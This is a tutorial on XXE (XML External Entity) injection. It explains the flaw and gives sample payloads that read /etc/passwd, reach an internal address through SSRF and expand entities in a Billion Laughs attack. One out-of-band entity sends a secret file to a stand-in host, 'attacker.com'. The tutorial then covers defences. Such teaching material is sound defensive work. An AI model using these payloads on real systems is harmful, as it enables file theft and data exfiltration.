XXE (XML External Entity Injection) Vulnerability and Protection
Description
XXE (XML External Entity Injection) is a security vulnerability targeting XML processors. When an application parses user-submitted XML data and fails to disable external entity loading, attackers can construct malicious XML entities to read server files, initiate SSRF attacks, or cause denial of service. This vulnerability commonly appears in web services, APIs, or document parsing features.
Key Points
- XML Basic Structure: XML documents can define entities (i.e., data units), for example
<!ENTITY name "value">. - External Entities: Reference external resources via the
SYSTEMkeyword, such as<!ENTITY ext SYSTEM "file:///etc/passwd">. - Dangerous Operations: If the XML parser replaces external entities with actual content and returns it, it may lead to information disclosure.
Step-by-Step Analysis of Vulnerability Principle
Step 1: Normal XML Parsing Scenario
Assume a web application accepts XML input and returns parsing results:
<!-- User-submitted legitimate XML -->
<data>
<name>John</name>
</data>
After parsing, the server returns: Hello John.
Step 2: Attacker Injects Malicious External Entity
The attacker submits the following XML:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE payload [
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<data>
<name>&file;</name>
</data>
<!DOCTYPE>defines the document type, declaring an external entity namedfilepointing to the system file/etc/passwd.&file;will be replaced by the file content during parsing.
Step 3: Vulnerability Trigger Result
If the server does not filter external entities, the response may contain the file content:
<data>
<name>root:x:0:0:root:/root:/bin/bash...</name>
</data>
Thus, the attacker steals sensitive files.
Advanced Vulnerability Exploitation Scenarios
- Reading Remote Files: Read internal network resources via the
http://protocol, e.g.,<!ENTITY ssrf SYSTEM "http://192.168.1.1/admin">. - Denial of Service Attack: Exhaust memory using recursive entity expansion (e.g., "Billion Laughs Attack"):
<!ENTITY a "&b;&b;"> <!ENTITY b "&c;&c;"> <!ENTITY c "..."> - Data Exfiltration (OOB XXE): When responses do not directly return data, send data to the attacker's server via DNS or HTTP requests:
<!ENTITY % payload SYSTEM "file:///secret.txt"> <!ENTITY % oob "<!ENTITY exfiltrate SYSTEM 'http://attacker.com/?data=%payload;'>">
Protective Measures
- Disable External Entities:
- PHP:
libxml_disable_entity_loader(true); - Java: Set
FEATURE_SECURE_PROCESSINGforSAXParserFactory.
- PHP:
- Use Secure Parsers: Such as Python's
defusedxmllibrary, which automatically protects against XXE. - Input Filtering: Validate XML structure using whitelists, or use safer data formats like JSON.
- Principle of Least Privilege: The account running the XML parser should have no access to sensitive files.
Summary
XXE vulnerabilities stem from improper XML parser configuration. Effective protection can be achieved by strictly controlling external entity loading, updating dependency libraries, and standardizing data formats.